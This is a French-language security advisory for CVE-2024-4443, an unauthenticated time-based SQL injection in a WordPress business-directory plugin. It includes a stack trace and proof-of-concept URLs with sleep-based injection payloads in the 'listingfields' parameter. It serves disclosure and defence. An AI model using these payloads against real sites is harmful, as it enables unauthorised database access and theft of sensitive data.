
CVE-2024-4443 Plugin Business Directory – Easy Listing Directories pour WordPress <= 6.4.2 - Injection SQL non authentifiée via listingfields Parameter
CVE-2024-4443 Business Directory Plugin – Easy Listing Directories pour WordPress <= 6.4.2 - Injection SQL non authentifiée via le paramètre listingfields
Le plugin Business Directory Plugin – Easy Listing Directories pour WordPress est vulnérable à une injection SQL temporelle via le paramètre 'listingfields' dans toutes les versions jusqu'à la 6.4.2 incluse, en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'un manque de préparation adéquate de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes déjà existantes, pouvant être utilisées pour extraire des informations sensibles de la base de données.
WPBDP__Listing_Search->execute (\business-directory-plugin\includes\helpers\class-listing-search.php:88)
WPBDP__Listing_Search->_traverse_tree (\business-directory-plugin\includes\helpers\class-listing-search.php:185)
WPBDP__Listing_Search->__construct (\business-directory-plugin\includes\helpers\class-listing-search.php:35)
WPBDP__Listing_Search::parse_request (\business-directory-plugin\includes\helpers\class-listing-search.php:214)
WPBDP__Listing_Search::from_request (\business-directory-plugin\includes\helpers\class-listing-search.php:210)
WPBDP__Views__Search->dispatch (\business-directory-plugin\includes\controllers\pages\class-search.php:54)
URL : <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[{{Injection payload}}][1]=
URL normale : <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[1]=

URL payload false : <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=0,5,0))+))--+-][1]=

URL payload true : <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=1,5,0))+))--+-][1]=
